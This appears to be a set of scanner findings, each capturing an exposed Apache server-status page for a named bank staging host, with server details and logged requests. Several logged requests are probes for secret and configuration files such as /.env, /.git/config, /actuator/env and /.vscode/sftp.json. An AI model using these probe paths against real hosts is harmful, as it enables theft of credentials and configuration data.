HTTP/1.1 0-199-0/0/7123. 0.0060564529293300.00.0081.32 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-199-0/0/7146. 0.0060564519999580.00.0079.81 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7195. 0.0060564519483450.00.0084.59 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-199-0/0/7224. 0.0060564519705100.00.00120.88 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7215. 0.0060564519610140.00.0089.27 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7171. 0.0060564529880580.00.00104.48 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-199-0/0/7178. 0.0060564519362440.00.0071.55 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7183. 0.0060564549365450.00.0087.57 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-199-0/0/7124. 0.0060564529202050.00.0075.63 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-199-0/0/7090. 0.0060564519716660.00.0098.31 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7188. 0.0060564519033470.00.00110.10 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7109. 0.0060564519341690.00.0081.43 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7170. 0.0060564519345470.00.0080.48 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7194. 0.0060564509439910.00.00108.06 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7204. 0.0060564569525520.00.0074.32 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-199-0/0/7202. 0.0060564519259920.00.0088.06 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7131. 0.0060564519276110.00.0089.53 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7164. 0.0060564539338560.00.00126.48 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-199-0/0/7229. 0.0060564539658680.00.0073.86 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-199-0/0/7154. 0.0060564519376770.00.0083.44 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7143. 0.0060564519847980.00.0094.47 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-207179270710/0/10143W 0.00007751030.00.0069.17 127.0.0.1http/1.1127.0.1.1:8080GET /server-status HTTP/1.1 1-20717927070/1/10123_ 0.015307831520.00.0070.79 127.0.0.1http/1.1127.0.1.1:8080GET /.env.backup HTTP/1.1 1-20717927070/1/10125_ 0.015307364950.00.0072.68 127.0.0.1http/1.1127.0.1.1:8080GET /blog/.env HTTP/1.1 1-20717927070/2/10173_ 0.025817887590.00.0073.68 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-20717927070/1/10131_ 0.0232917856420.00.0072.65 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-20717927070/1/10157_ 0.0032407621320.00.0070.86 127.0.0.1http/1.1127.0.1.1:8080GET /bedesk1.1/.env HTTP/1.1 1-20717927070/2/10167_ 0.02007735870.00.0069.96 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-20717927070/2/10074_ 0.02008920450.00.0078.91 127.0.0.1http/1.1127.0.1.1:8080GET /@vite/env HTTP/1.1 1-20717927070/2/10184_ 0.02007861180.00.0070.80 127.0.0.1http/1.1127.0.1.1:8080GET /actuator/env HTTP/1.1 1-20717927070/1/10075_ 0.0018908012910.00.0073.37 127.0.0.1http/1.1127.0.1.1:8080GET /database/.env HTTP/1.1 1-20717927070/2/10087_ 0.0219417604030.00.0068.34 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-20717927070/1/10061_ 0.0018907761000.00.0070.04 127.0.0.1http/1.1127.0.1.1:8080GET /.env.local HTTP/1.1 1-20717927070/2/10111_ 0.04007724440.00.0071.52 127.0.0.1http/1.1127.0.1.1:8080GET /.vscode/sftp.json HTTP/1.1 1-20717927070/1/10006_ 0.0014907894210.00.0069.16 127.0.0.1http/1.1127.0.1.1:8080GET /api/.env HTTP/1.1 1-20717927070/2/10146_ 0.02008056670.00.0068.13 127.0.0.1http/1.1127.0.1.1:8080GET /server HTTP/1.1 1-20717927070/1/10127_ 0.00324010409720.00.0078.22 127.0.0.1http/1.1127.0.1.1:8080GET /test/bedesk1.1/.env HTTP/1.1 1-20717927070/1/10103_ 0.0014907211330.00.0069.62 127.0.0.1http/1.1127.0.1.1:8080GET /admin/.env HTTP/1.1 1-20717927070/2/10055_ 0.04008230490.00.0071.39 127.0.0.1http/1.1127.0.1.1:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-20717927070/1/10080_ 0.0249407957170.00.0072.24 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-20717927070/1/10016_ 0.0048937667010.00.0071.86 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-20717927070/2/10057_ 0.0215417939740.00.0068.40 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-20717927070/0/10155_ 0.0048907886920.00.0068.12 127.0.0.1http/1.1127.0.1.1:8080GET /.env HTTP/1.1 1-20717927070/1/10044_ 0.04008037050.00.0068.47 127.0.0.1http/1.1127.0.1.1:8080GET /about HTTP/1.1 1-20717927070/2/10106_ 0.04008299830.00.0070.98 127.0.0.1http/1.1127.0.1.1:8080GET /v2/_catalog HTTP/1.1 1-20717927070/1/10080_ 0.04007970890.00.0068.45 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config HTTP/1.1 2-20717927080/1/7107_ 0.00454311008610.00.0057.38 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b25129757c52
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.62 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2024-10-04T15:21:08 Current Time: Thursday, 03-Jul-2025 03:03:51 CEST Restart Time: Tuesday, 10-Dec-2024 16:11:42 CET Parent Server Config. Generation: 206 Parent Server MPM Generation: 205 Server uptime: 204 days 9 hours 52 minutes 8 seconds Server load: 0.00 0.00 0.00 Total accesses: 778212 - Total Traffic: 7.2 GB - Total Duration: 102345697 CPU Usage: u519.6 s711.7 cu965.8 cs342.84 - .0144% CPU load .0441 requests/sec - 438 B/second - 9.7 kB/request - 131.514 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewritingkeep-aliveclosing 11495871no0yes1024000 21495872no0yes0025000 Sum200 1049000 ........................._____________________W_________________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-199-0/0/7216. 0.0044302519587620.00.00104.01 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7166. 0.0044302519335660.00.0087.00 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7091. 0.0044302519533610.00.0072.34 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7160. 0.0044302519147850.00.0071.50 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7123. 0.0044302529293300.00.0081.32 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-199-0/0/7146. 0.0044302519999580.00.0079.81 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7195. 0.0044302519483450.00.0084.59 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-199-0/0/7224. 0.0044302519705100.00.00120.88 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7215. 0.0044302519610140.00.0089.27 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7171. 0.0044302529880580.00.00104.48 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-199-0/0/7178. 0.0044302519362440.00.0071.55 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7183. 0.0044302549365450.00.0087.57 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-199-0/0/7124. 0.0044302529202050.00.0075.63 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-199-0/0/7090. 0.0044302519716660.00.0098.31 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7188. 0.0044302519033470.00.00110.10 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7109. 0.0044302519341690.00.0081.43 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7170. 0.0044302519345470.00.0080.48 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7194. 0.0044302509439910.00.00108.06 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7204. 0.0044302569525520.00.0074.32 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-199-0/0/7202. 0.0044302519259920.00.0088.06 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7131. 0.0044302519276110.00.0089.53 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7164. 0.0044302539338560.00.00126.48 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-199-0/0/7229. 0.0044302539658680.00.0073.86 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-199-0/0/7154. 0.0044302519376770.00.0083.44 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7143. 0.0044302519847980.00.0094.47 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-20514958710/8/9566_ 0.2243007597670.00.0264.86 127.0.0.1http/1.1127.0.1.1:8080GET /.git/config HTTP/1.1 1-20514958710/6/9567_ 0.2543517724750.00.0166.73 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-20514958710/4/9535_ 0.2246807219510.00.0068.72 127.0.0.1http/1.1127.0.1.1:8080GET /.DS_Store HTTP/1.1 1-20514958710/7/9584_ 0.2246807722890.00.0170.08 127.0.0.1http/1.1127.0.1.1:8080GET /_all_dbs HTTP/1.1 1-20514958710/7/9562_ 0.2447327747270.00.0169.15 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-20514958710/5/9576_ 0.2243007475570.00.0167.22 127.0.0.1http/1.1127.0.1.1:8080GET /s/334323e2333313e27363e23323/_/;/META-INF/maven/com.atlass 1-20514958710/5/9589_ 0.2517327603140.00.0166.40 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-20514958710/8/9494_ 0.2216808745970.00.0174.56 127.0.0.1http/1.1127.0.1.1:8080GET /telescope/requests HTTP/1.1 1-20514958710/6/9602_ 0.2216807653050.00.0167.18 127.0.0.1http/1.1127.0.1.1:8080GET /info.php HTTP/1.1 1-20514958710/5/9488_ 0.2513547901930.00.0169.75 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-20514958710/7/9511_ 0.2013017438120.00.0164.56 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-20514958710/5/9483_ 0.1613007577940.00.0066.27 127.0.0.1http/1.1127.0.1.1:8080GET /.vscode/sftp.json HTTP/1.1 1-20514958710/6/9522_ 0.25217589960.00.0168.17 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-20514958710/9/9422_ 0.26107745550.00.0265.06 127.0.0.1http/1.1127.0.1.1:8080GET /@vite/env HTTP/1.1 1-20514958710/6/9571_ 0.26007922060.00.0164.54 127.0.0.1http/1.1127.0.1.1:8080GET /actuator/env HTTP/1.1 1-20514958710/4/9553_ 0.260010202580.00.0074.44 127.0.0.1http/1.1127.0.1.1:8080GET /server HTTP/1.1 1-20514958710/8/9526_ 0.26007037110.00.0266.00 127.0.0.1http/1.1127.0.1.1:8080GET /.vscode/sftp.json HTTP/1.1 1-20514958710/7/9472_ 0.26008112420.00.0167.45 127.0.0.1http/1.1127.0.1.1:8080GET /about HTTP/1.1 1-20514958710/6/9515_ 0.26007708600.00.0068.50 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config HTTP/1.1 1-20514958710/8/9442_ 0.26007502980.00.0268.23 127.0.0.1http/1.1127.0.1.1:8080GET /v2/_catalog HTTP/1.1 1-20514958710/7/9487_ 0.26007808900.00.0164.99 127.0.0.1http/1.1127.0.1.1:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-205149587110/4/9588W 0.21007767960.00.0164.05 127.0.0.1http/1.1127.0.1.1:8080GET /server-status HTTP/1.1 1-20514958710/7/9467_ 0.2477317927830.00.0164.42 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-20514958710/6/9530_ 0.2176808141350.00.0167.56 127.0.0.1http/1.1127.0.1.1:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-20514958710/4/9493_ 0.2276867843060.00.0164.77 127.0.0.1http/1.1127.0.1.1:8080GET /server-status HTTP/1.1 2-20514958720/5/6757_ 0.14652110941340.00.0155.28 127.0.0.1http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b25143b7b7ec
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.62 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2024-10-04T15:21:08 Current Time: Tuesday, 01-Jul-2025 02:17:48 CEST Restart Time: Tuesday, 10-Dec-2024 16:11:42 CET Parent Server Config. Generation: 204 Parent Server MPM Generation: 203 Server uptime: 202 days 9 hours 6 minutes 5 seconds Server load: 0.00 0.00 0.00 Total accesses: 733569 - Total Traffic: 7.2 GB - Total Duration: 102288875 CPU Usage: u514.39 s704.67 cu951.23 cs332.96 - .0143% CPU load .042 requests/sec - 440 B/second - 10.3 kB/request - 139.44 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewritingkeep-aliveclosing 11198377no0yes0025000 21198378no0yes1024000 Sum200 1049000 .........................______________________________W________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-199-0/0/7216. 0.0026746319587620.00.00104.01 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7166. 0.0026746319335660.00.0087.00 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7091. 0.0026746319533610.00.0072.34 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7160. 0.0026746319147850.00.0071.50 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7123. 0.0026746329293300.00.0081.32 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-199-0/0/7146. 0.0026746319999580.00.0079.81 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7195. 0.0026746319483450.00.0084.59 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-199-0/0/7224. 0.0026746319705100.00.00120.88 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7215. 0.0026746319610140.00.0089.27 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7171. 0.0026746329880580.00.00104.48 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-199-0/0/7178. 0.0026746319362440.00.0071.55 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7183. 0.0026746349365450.00.0087.57 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-199-0/0/7124. 0.0026746329202050.00.0075.63 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-199-0/0/7090. 0.0026746319716660.00.0098.31 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7188. 0.0026746319033470.00.00110.10 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7109. 0.0026746319341690.00.0081.43 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7170. 0.0026746319345470.00.0080.48 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7194. 0.0026746309439910.00.00108.06 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7204. 0.0026746369525520.00.0074.32 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-199-0/0/7202. 0.0026746319259920.00.0088.06 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7131. 0.0026746319276110.00.0089.53 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7164. 0.0026746339338560.00.00126.48 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-199-0/0/7229. 0.0026746339658680.00.0073.86 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-199-0/0/7154. 0.0026746319376770.00.0083.44 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7143. 0.0026746319847980.00.0094.47 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-20311983770/1/8918_ 0.0741017592800.00.0064.21 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-20311983770/1/8916_ 0.0095917719400.00.0066.11 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-20311983770/1/8885_ 0.0395907217730.00.0067.92 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-20311983770/1/8927_ 0.0796407718360.00.0069.44 127.0.0.1http/1.1127.0.1.1:8080GET /developmentserver/metadatauploader HTTP/1.1 1-20311983770/1/8906_ 0.00126817740350.00.0068.53 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-20311983770/1/8918_ 0.0440517467100.00.0066.58 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-20311983770/1/8938_ 0.0040527596070.00.0065.77 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-20311983770/0/8839_ 0.00356618741860.00.0073.90 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-20311983770/1/8943_ 0.04341017646090.00.0066.53 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-20311983770/1/8840_ 0.02340577900730.00.0069.14 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-20311983770/0/8854_ 0.00340517431200.00.0063.94 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-20311983770/1/8836_ 0.05267817575000.00.0065.04 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-20311983770/1/8865_ 0.05337367583440.00.0067.34 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-20311983770/1/8762_ 0.03267327744070.00.0064.43 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-20311983770/1/8915_ 0.03142617884110.00.0063.92 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-20311983770/1/8896_ 0.023368010186650.00.0073.76 127.0.0.1http/1.1127.0.1.1:8080GET /cgi-bin/luci/;stok=/locale HTTP/1.1 1-20311983770/0/8869_ 0.00142607035600.00.0065.34 127.0.0.1http/1.1127.0.1.1:8080GET /favicon.ico HTTP/1.1 1-20311983770/0/8811_ 0.00336808107600.00.0066.69 127.0.0.1http/1.1127.0.1.1:8080GET /favicon.ico HTTP/1.1 1-20311983770/1/8856_ 0.05127347707310.00.0067.80 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-20311983770/1/8787_ 0.05277327501560.00.0067.48 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-20311983770/1/8831_ 0.03126817804460.00.0064.33 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-20311983770/1/8935_ 0.02276817759490.00.0063.36 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-20311983770/0/8823_ 0.00267317919900.00.0063.81 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-20311983770/0/8881_ 0.00276808136510.00.0066.87 127.0.0.1http/1.1127.0.1.1:8080GET /upl.php HTTP/1.1 1-20311983770/1/8837_ 0.05143127841770.00.0064.15 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 2-20311983780/3/5629_ 0.190010916290.00.0153.97 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 2-20311983780/4/5615_ 0.18570
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b251e5d347c5
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.62 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2024-10-04T15:21:08 Current Time: Monday, 30-Jun-2025 11:57:21 CEST Restart Time: Tuesday, 10-Dec-2024 16:11:42 CET Parent Server Config. Generation: 203 Parent Server MPM Generation: 202 Server uptime: 201 days 18 hours 45 minutes 38 seconds Server load: 0.00 0.00 0.00 Total accesses: 733018 - Total Traffic: 7.2 GB - Total Duration: 102285136 CPU Usage: u513.76 s702.83 cu949.27 cs332.2 - .0143% CPU load .042 requests/sec - 441 B/second - 10.3 kB/request - 139.54 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewritingkeep-aliveclosing 11050180no0yes1024000 21050182no0yes0025000 Sum200 1049000 .........................__________________W____________________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-199-0/0/7216. 0.0021583519587620.00.00104.01 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7166. 0.0021583519335660.00.0087.00 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7091. 0.0021583519533610.00.0072.34 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7160. 0.0021583519147850.00.0071.50 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7123. 0.0021583529293300.00.0081.32 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-199-0/0/7146. 0.0021583519999580.00.0079.81 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7195. 0.0021583519483450.00.0084.59 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-199-0/0/7224. 0.0021583519705100.00.00120.88 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7215. 0.0021583519610140.00.0089.27 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7171. 0.0021583529880580.00.00104.48 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-199-0/0/7178. 0.0021583519362440.00.0071.55 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7183. 0.0021583549365450.00.0087.57 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-199-0/0/7124. 0.0021583529202050.00.0075.63 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-199-0/0/7090. 0.0021583519716660.00.0098.31 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7188. 0.0021583519033470.00.00110.10 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7109. 0.0021583519341690.00.0081.43 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7170. 0.0021583519345470.00.0080.48 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7194. 0.0021583509439910.00.00108.06 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7204. 0.0021583569525520.00.0074.32 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-199-0/0/7202. 0.0021583519259920.00.0088.06 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7131. 0.0021583519276110.00.0089.53 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7164. 0.0021583539338560.00.00126.48 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-199-0/0/7229. 0.0021583539658680.00.0073.86 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-199-0/0/7154. 0.0021583519376770.00.0083.44 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7143. 0.0021583519847980.00.0094.47 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-20210501800/5/8913_ 0.3294027592730.00.0164.20 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-20210501800/4/8910_ 0.35007719330.00.0166.09 127.0.0.1http/1.1127.0.1.1:8080GET /@vite/env HTTP/1.1 1-20210501800/5/8878_ 0.35007217420.00.0167.52 127.0.0.1http/1.1127.0.1.1:8080GET /.vscode/sftp.json HTTP/1.1 1-20210501800/7/8921_ 0.35007718300.00.0169.43 127.0.0.1http/1.1127.0.1.1:8080GET /about HTTP/1.1 1-20210501800/4/8902_ 0.35007740240.00.0168.51 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config HTTP/1.1 1-20210501800/5/8912_ 0.35007467030.00.0166.56 127.0.0.1http/1.1127.0.1.1:8080GET /v2/_catalog HTTP/1.1 1-20210501800/6/8932_ 0.35007595980.00.0265.76 127.0.0.1http/1.1127.0.1.1:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-20210501800/6/8835_ 0.31187828741820.00.0173.88 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-20210501800/5/8939_ 0.3094027646040.00.0166.52 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-20210501800/4/8831_ 0.3468317900520.00.0169.05 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-20210501800/4/8849_ 0.3367817431140.00.0163.93 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-20210501800/5/8831_ 0.3067817547440.00.0265.02 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-20210501800/4/8858_ 0.29187807583330.00.0167.33 127.0.0.1http/1.1127.0.1.1:8080GET /favicon.ico HTTP/1.1 1-20210501800/4/8756_ 0.3564517743930.00.0164.42 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-20210501800/4/8908_ 0.34128317884010.00.0163.91 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-20210501800/4/8891_ 0.33640110186550.00.0173.76 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-20210501800/6/8864_ 0.3064017035520.00.0165.33 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-20210501800/5/8807_ 0.31127818107530.00.0166.69 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-202105018010/3/8850W 0.28007707140.00.0167.78 127.0.0.1http/1.1127.0.1.1:8080GET /server-status HTTP/1.1 1-20210501800/4/8780_ 0.30127857501460.00.0167.47 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-20210501800/4/8825_ 0.35117804400.00.0164.33 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-20210501800/4/8926_ 0.3494517759400.00.0163.34 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto 